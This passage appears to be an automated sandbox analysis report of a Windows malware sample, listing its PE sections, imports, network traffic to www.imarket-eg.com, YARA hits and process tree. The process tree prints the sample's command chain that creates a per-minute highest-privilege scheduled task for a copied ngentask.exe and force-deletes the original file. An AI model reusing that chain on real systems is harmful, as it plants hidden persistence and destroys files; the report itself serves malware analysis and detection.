                        .rdata | 0xf0000 | 0x254a | 0x2600 | False | 0.3405633223684211 | data | 4.93477861528342 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .data | 0xf3000 | 0x31a4 | 0xe00 | False | 0.19921875 | data | 2.249537468379531 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .rsrc | 0xf7000 | 0x23c70 | 0x23e00 | False | 0.8160864002613241 | data | 7.279101888009963 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        Name | RVA | Size | Type | Language | Country
                        RT_ICON | 0xf7400 | 0x18084 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | Portuguese | Brazil
                        RT_ICON | 0x10f488 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16384 | Portuguese | Brazil
                        RT_ICON | 0x1136b0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | Portuguese | Brazil
                        RT_ICON | 0x115c58 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304 | Portuguese | Brazil
                        RT_ICON | 0x116b00 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | Portuguese | Brazil
                        RT_ICON | 0x117168 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | Portuguese | Brazil
                        RT_ICON | 0x118210 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024 | Portuguese | Brazil
                        RT_ICON | 0x118ab8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | Portuguese | Brazil
                        RT_ICON | 0x118da0 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2304 | Portuguese | Brazil
                        RT_ICON | 0x119728 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576 | Portuguese | Brazil
                        RT_ICON | 0x119df0 | 0x1e8 | Device independent bitmap graphic, 24 x 48 x 4, image size 288 | Portuguese | Brazil
                        RT_ICON | 0x119fd8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | Portuguese | Brazil
                        RT_ICON | 0x11a440 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256 | Portuguese | Brazil
                        RT_ICON | 0x11a9a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | Portuguese | Brazil
                        RT_MENU | 0x11aba0 | 0x48 | Matlab v4 mat-file (little endian) C, numeric, rows 5636240, columns 7077985, imaginary | Portuguese | Brazil
                        RT_MENU | 0x11abe8 | 0x6c | data | Portuguese | Brazil
                        RT_ACCELERATOR | 0x11ac58 | 0x8 | data | Portuguese | Brazil
                        RT_ACCELERATOR | 0x11ac60 | 0x10 | data | Portuguese | Brazil
                        RT_GROUP_ICON | 0x11aad0 | 0xca | Targa image data - Map 32 x 32900 x 1 +1 | Portuguese | Brazil
                        DLL | Import
                        KERNEL32.dll | CreateFileW, lstrcmpiW, HeapSize, WriteConsoleW, SetStdHandle, IsProcessorFeaturePresent, FlushFileBuffers, GetDiskFreeSpaceW, GetProcAddress, GetLastError, lstrcmpW, LoadLibraryW, CloseHandle, GlobalAlloc, MultiByteToWideChar, MoveFileA, HeapAlloc, EnterCriticalSection, LeaveCriticalSection, DeleteFileA, HeapReAlloc, GetCommandLineW, HeapSetInformation, GetStartupInfoW, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetCPInfo, InterlockedIncrement, InterlockedDecrement, GetACP, GetOEMCP, IsValidCodePage, EncodePointer, TlsAlloc, TlsGetValue, TlsSetValue, DecodePointer, TlsFree, GetModuleHandleW, SetLastError, GetCurrentThreadId, SetHandleCount, GetStdHandle, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, ExitProcess, WriteFile, GetModuleFileNameW, HeapCreate, Sleep, HeapFree, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, WideCharToMultiByte, LCMapStringW, GetStringTypeW, SetFilePointer, GetConsoleCP, GetConsoleMode, RtlUnwind
                        USER32.dll | GetMessageW, LoadCursorW, GetDC, TranslateMessage, LoadIconW, ShowWindow, CreateWindowExW, RegisterClassW, DispatchMessageW
                        GDI32.dll | CreateFontW, ChoosePixelFormat, SetPixelFormat, GetStockObject, CreateSolidBrush, DeleteObject
                        Language of compilation system | Country where language is spoken
                        Portuguese | Brazil
                        • Total Packets: 30
                        • 443 (HTTPS)
                        • 53 (DNS)
                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                        Nov 18, 2022 07:52:44.552045107 CET | 49702 | 443 | 192.168.2.6 | 160.153.50.70
                        Nov 18, 2022 07:52:44.552134037 CET | 443 | 49702 | 160.153.50.70 | 192.168.2.6
                        Nov 18, 2022 07:52:44.552263975 CET | 49702 | 443 | 192.168.2.6 | 160.153.50.70
                        Nov 18, 2022 07:52:44.607594967 CET | 49702 | 443 | 192.168.2.6 | 160.153.50.70
                        Nov 18, 2022 07:52:44.607652903 CET | 443 | 49702 | 160.153.50.70 | 192.168.2.6
                        Nov 18, 2022 07:52:45.107064962 CET | 443 | 49702 | 160.153.50.70 | 192.168.2.6
                        Nov 18, 2022 07:52:45.107203960 CET | 49702 | 443 | 192.168.2.6 | 160.153.50.70
                        Nov 18, 2022 07:52:45.531378984 CET | 49702 | 443 | 192.168.2.6 | 160.153.50.70
                        Nov 18, 2022 07:52:45.531441927 CET | 443 | 49702 | 160.153.50.70 | 192.168.2.6
                        Nov 18, 2022 07:52:45.532157898 CET | 443 | 49702 | 160.153.50.70 | 192.168.2.6
                        Nov 18, 2022 07:52:45.532262087 CET | 49702 | 443 | 192.168.2.6 | 160.153.50.70
                        Nov 18, 2022 07:52:45.536410093 CET | 49702 | 443 | 192.168.2.6 | 160.153.50.70
                        Nov 18, 2022 07:52:45.536426067 CET | 443 | 49702 | 160.153.50.70 | 192.168.2.6
                        Nov 18, 2022 07:52:47.669153929 CET | 443 | 49702 | 160.153.50.70 | 192.168.2.6
                        Nov 18, 2022 07:52:47.669244051 CET | 443 | 49702 | 160.153.50.70 | 192.168.2.6
                        Nov 18, 2022 07:52:47.669364929 CET | 49702 | 443 | 192.168.2.6 | 160.153.50.70
                        Nov 18, 2022 07:52:47.669424057 CET | 443 | 49702 | 160.153.50.70 | 192.168.2.6
                        Nov 18, 2022 07:52:47.669467926 CET | 49702 | 443 | 192.168.2.6 | 160.153.50.70
                        Nov 18, 2022 07:52:47.669487953 CET | 49702 | 443 | 192.168.2.6 | 160.153.50.70
                        Nov 18, 2022 07:52:47.831084013 CET | 443 | 49702 | 160.153.50.70 | 192.168.2.6
                        Nov 18, 2022 07:52:47.831202984 CET | 49702 | 443 | 192.168.2.6 | 160.153.50.70
                        Nov 18, 2022 07:52:47.831209898 CET | 443 | 49702 | 160.153.50.70 | 192.168.2.6
                        Nov 18, 2022 07:52:47.831233978 CET | 443 | 49702 | 160.153.50.70 | 192.168.2.6
                        Nov 18, 2022 07:52:47.831283092 CET | 443 | 49702 | 160.153.50.70 | 192.168.2.6
                        Nov 18, 2022 07:52:47.831288099 CET | 49702 | 443 | 192.168.2.6 | 160.153.50.70
                        Nov 18, 2022 07:52:47.831312895 CET | 49702 | 443 | 192.168.2.6 | 160.153.50.70
                        Nov 18, 2022 07:52:47.831322908 CET | 443 | 49702 | 160.153.50.70 | 192.168.2.6
                        Nov 18, 2022 07:52:47.831348896 CET | 49702 | 443 | 192.168.2.6 | 160.153.50.70
                        Nov 18, 2022 07:52:47.831372976 CET | 49702 | 443 | 192.168.2.6 | 160.153.50.70
                        Nov 18, 2022 07:52:47.831379890 CET | 443 | 49702 | 160.153.50.70 | 192.168.2.6
                        Nov 18, 2022 07:52:47.831424952 CET | 49702 | 443 | 192.168.2.6 | 160.153.50.70
                        Nov 18, 2022 07:52:47.993324995 CET | 443 | 49702 | 160.153.50.70 | 192.168.2.6
                        Nov 18, 2022 07:52:47.993482113 CET | 443 | 49702 | 160.153.50.70 | 192.168.2.6
                        Nov 18, 2022 07:52:47.993555069 CET | 49702 | 443 | 192.168.2.6 | 160.153.50.70
                        Nov 18, 2022 07:52:47.993590117 CET | 443 | 49702 | 160.153.50.70 | 192.168.2.6
                        Nov 18, 2022 07:52:47.993628025 CET | 49702 | 443 | 192.168.2.6 | 160.153.50.70
                        Nov 18, 2022 07:52:47.993664026 CET | 49702 | 443 | 192.168.2.6 | 160.153.50.70
                        Nov 18, 2022 07:52:47.993762970 CET | 443 | 49702 | 160.153.50.70 | 192.168.2.6
                        Nov 18, 2022 07:52:47.993833065 CET | 49702 | 443 | 192.168.2.6 | 160.153.50.70
                        Nov 18, 2022 07:52:47.993840933 CET | 443 | 49702 | 160.153.50.70 | 192.168.2.6
                        Nov 18, 2022 07:52:47.993885040 CET | 49702 | 443 | 192.168.2.6 | 160.153.50.70
                        Nov 18, 2022 07:52:47.994016886 CET | 443 | 49702 | 160.153.50.70 | 192.168.2.6
                        Nov 18, 2022 07:52:47.994083881 CET | 49702 | 443 | 192.168.2.6 | 160.153.50.70
                        Nov 18, 2022 07:52:47.994091988 CET | 443 | 49702 | 160.153.50.70 | 192.168.2.6
                        Nov 18, 2022 07:52:47.994137049 CET | 49702 | 443 | 192.168.2.6 | 160.153.50.70
                        Nov 18, 2022 07:52:47.994291067 CET | 443 | 49702 | 160.153.50.70 | 192.168.2.6
                        Nov 18, 2022 07:52:47.994364977 CET | 49702 | 443 | 192.168.2.6 | 160.153.50.70
                        Nov 18, 2022 07:52:47.994373083 CET | 443 | 49702 | 160.153.50.70 | 192.168.2.6
                        Nov 18, 2022 07:52:47.994420052 CET | 49702 | 443 | 192.168.2.6 | 160.153.50.70
                        Nov 18, 2022 07:52:48.156018972 CET | 443 | 49702 | 160.153.50.70 | 192.168.2.6
                        Nov 18, 2022 07:52:48.156172991 CET | 443 | 49702 | 160.153.50.70 | 192.168.2.6
                        Nov 18, 2022 07:52:48.156321049 CET | 49702 | 443 | 192.168.2.6 | 160.153.50.70
                        Nov 18, 2022 07:52:48.156404972 CET | 49702 | 443 | 192.168.2.6 | 160.153.50.70
                        Nov 18, 2022 07:52:48.173702002 CET | 49702 | 443 | 192.168.2.6 | 160.153.50.70
                        Nov 18, 2022 07:52:48.173732042 CET | 443 | 49702 | 160.153.50.70 | 192.168.2.6
                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                        Nov 18, 2022 07:52:42.022449970 CET | 53107 | 53 | 192.168.2.6 | 8.8.8.8
                        Nov 18, 2022 07:52:42.040594101 CET | 53 | 53107 | 8.8.8.8 | 192.168.2.6
                        Nov 18, 2022 07:52:44.477853060 CET | 64601 | 53 | 192.168.2.6 | 8.8.8.8
                        Nov 18, 2022 07:52:44.497093916 CET | 53 | 64601 | 8.8.8.8 | 192.168.2.6
                        Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                        Nov 18, 2022 07:52:42.022449970 CET | 192.168.2.6 | 8.8.8.8 | 0xd30b | Standard query (0) | vxsljuxgekdpuv.307xvytdn0 | A (IP address) | IN (0x0001) | false
                        Nov 18, 2022 07:52:44.477853060 CET | 192.168.2.6 | 8.8.8.8 | 0x1cd7 | Standard query (0) | www.imarket-eg.com | A (IP address) | IN (0x0001) | false
                        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                        Nov 18, 2022 07:52:42.040594101 CET | 8.8.8.8 | 192.168.2.6 | 0xd30b | Name error (3) | vxsljuxgekdpuv.307xvytdn0 | none | none | A (IP address) | IN (0x0001) | false
                        Nov 18, 2022 07:52:44.497093916 CET | 8.8.8.8 | 192.168.2.6 | 0x1cd7 | No error (0) | www.imarket-eg.com | imarket-eg.com | | CNAME (Canonical name) | IN (0x0001) | false
                        Nov 18, 2022 07:52:44.497093916 CET | 8.8.8.8 | 192.168.2.6 | 0x1cd7 | No error (0) | imarket-eg.com | | 160.153.50.70 | A (IP address) | IN (0x0001) | false
                        • www.imarket-eg.com
                        Target ID:0
                        Start time:07:52:34
                        Start date:18/11/2022
                        Path:C:\Users\user\Desktop\QHSgso4hXH.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\Desktop\QHSgso4hXH.exe
                        Imagebase:0x400000
                        File size:1138176 bytes
                        MD5 hash:2F8DF206BA700503DBEBF59E937AF0EC
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious single byte XORed keyword 'Mozilla/5.0' - it uses yara's XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., Source: 00000000.00000003.260166226.0000000002256000.00000040.00000800.00020000.00000000.sdmp, Author: Florian Roth
                        • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000000.00000003.260166226.0000000002256000.00000040.00000800.00020000.00000000.sdmp, Author: Florian Roth
                        Reputation:low

                        Target ID:1
                        Start time:07:52:43
                        Start date:18/11/2022
                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
                        Imagebase:0xae0000
                        File size:85096 bytes
                        MD5 hash:ED7F195F7121781CC3D380942765B57D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET
                        Reputation:moderate

                        Target ID:2
                        Start time:07:52:45
                        Start date:18/11/2022
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "ngentask" /sc MINUTE /tr "C:\Users\user\AppData\Local\ServiceHub\ngentask.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe" &&START "" "C:\Users\user\AppData\Local\ServiceHub\ngentask.exe
                        Imagebase:0x1b0000
                        File size:232960 bytes
                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Target ID:3
                        Start time:07:52:45
                        Start date:18/11/2022
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6da640000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Target ID:4
                        Start time:07:52:45
                        Start date:18/11/2022
                        Path:C:\Windows\SysWOW64\chcp.com
                        Wow64 process (32bit):true
                        Commandline:chcp 65001
                        Imagebase:0x1b0000
                        File size:12800 bytes
                        MD5 hash:561054CF9C4B2897E80D7E7D9027FED9
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate

                        Target ID:5
                        Start time:07:52:45
                        Start date:18/11/2022
                        Path:C:\Windows\SysWOW64\PING.EXE
                        Wow64 process (32bit):true
                        Commandline:ping 127.0.0.1
                        Imagebase:0x13e0000
                        File size:18944 bytes
                        MD5 hash:70C24A306F768936563ABDADB9CA9108
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Target ID:7
                        Start time:07:52:52
                        Start date:18/11/2022
                        Path:C:\Windows\SysWOW64\schtasks.exe
                        Wow64 process (32bit):true
                        Commandline:schtasks /create /tn "ngentask" /sc MINUTE /tr "C:\Users\user\AppData\Local\ServiceHub\ngentask.exe" /rl HIGHEST /f
                        Imagebase:0x950000
                        File size:185856 bytes
                        MD5 hash:15FF7D8324231381BAD48A052F85DF04
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Target ID:8
                        Start time:07:52:53
                        Start date:18/11/2022
                        Path:C:\Users\user\AppData\Local\ServiceHub\ngentask.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\AppData\Local\ServiceHub\ngentask.exe"
                        Imagebase:0x6d0000
                        File size:85096 bytes
                        MD5 hash:ED7F195F7121781CC3D380942765B57D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET
                        Antivirus matches:
                        • Detection: 0%, ReversingLabs
                        • Detection: 0%, Metadefender, Browse
                        Reputation:moderate

                        Target ID:9
                        Start time:07:52:53
                        Start date:18/11/2022
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6da640000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Target ID:11
                        Start time:07:52:55
                        Start date:18/11/2022
                        Path:C:\Users\user\AppData\Local\ServiceHub\ngentask.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\AppData\Local\ServiceHub\ngentask.exe
                        Imagebase:0x6d0000
                        File size:85096 bytes
                        MD5 hash:ED7F195F7121781CC3D380942765B57D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET

                        Target ID:13
                        Start time:07:52:55
                        Start date:18/11/2022
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6da640000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Target ID:18
                        Start time:07:53:01
                        Start date:18/11/2022
                        Path:C:\Users\user\AppData\Local\ServiceHub\ngentask.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\AppData\Local\ServiceHub\ngentask.exe
                        Imagebase:0x580000
                        File size:85096 bytes
                        MD5 hash:ED7F195F7121781CC3D380942765B57D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET

                        Target ID:19
                        Start time:07:53:02
                        Start date:18/11/2022
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6da640000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Target ID:22
                        Start time:07:54:00
                        Start date:18/11/2022
                        Path:C:\Users\user\AppData\Local\ServiceHub\ngentask.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\AppData\Local\ServiceHub\ngentask.exe
                        Imagebase:0xd60000
                        File size:85096 bytes
                        MD5 hash:ED7F195F7121781CC3D380942765B57D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET

                        Target ID:23
                        Start time:07:54:01
                        Start date:18/11/2022
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6da640000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        No disassembly